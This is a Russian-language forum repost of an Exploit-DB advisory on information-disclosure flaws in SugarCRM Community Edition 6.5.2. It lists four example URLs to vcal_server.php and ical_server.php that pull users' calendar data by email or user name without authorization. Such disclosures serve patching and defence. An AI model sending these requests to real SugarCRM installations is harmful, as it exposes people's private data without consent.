Exploit SugarCRM Community Edition - Multiple Information Disclosure Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
37691
Проверка EDB
  1. Пройдено
Автор
BRENDAN COLES
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2012-08-31
SugarCRM Community Edition - Multiple Information Disclosure Vulnerabilities
Код:
source: https://www.securityfocus.com/bid/55347/info

SugarCRM Community Edition is prone to multiple information-disclosure vulnerabilities because it fails to restrict access to certain application data.

Attackers can exploit these issues to obtain sensitive information that may lead to further attacks.

SugarCRM Community Edition 6.5.2 is vulnerable; other versions may also be affected.

http://www.example.com/sugarcrm/vcal_server.php?type=vfb&[email protected]

http://www.example.com/sugarcrm/vcal_server.php?type=vfb&user_name=will

http://www.example.com/sugarcrm/ical_server.php?type=ics&key=&[email protected]

http://www.example.com/sugarcrm/ical_server.php?type=ics&key=&user_name=will
 
Источник
www.exploit-db.com

Похожие темы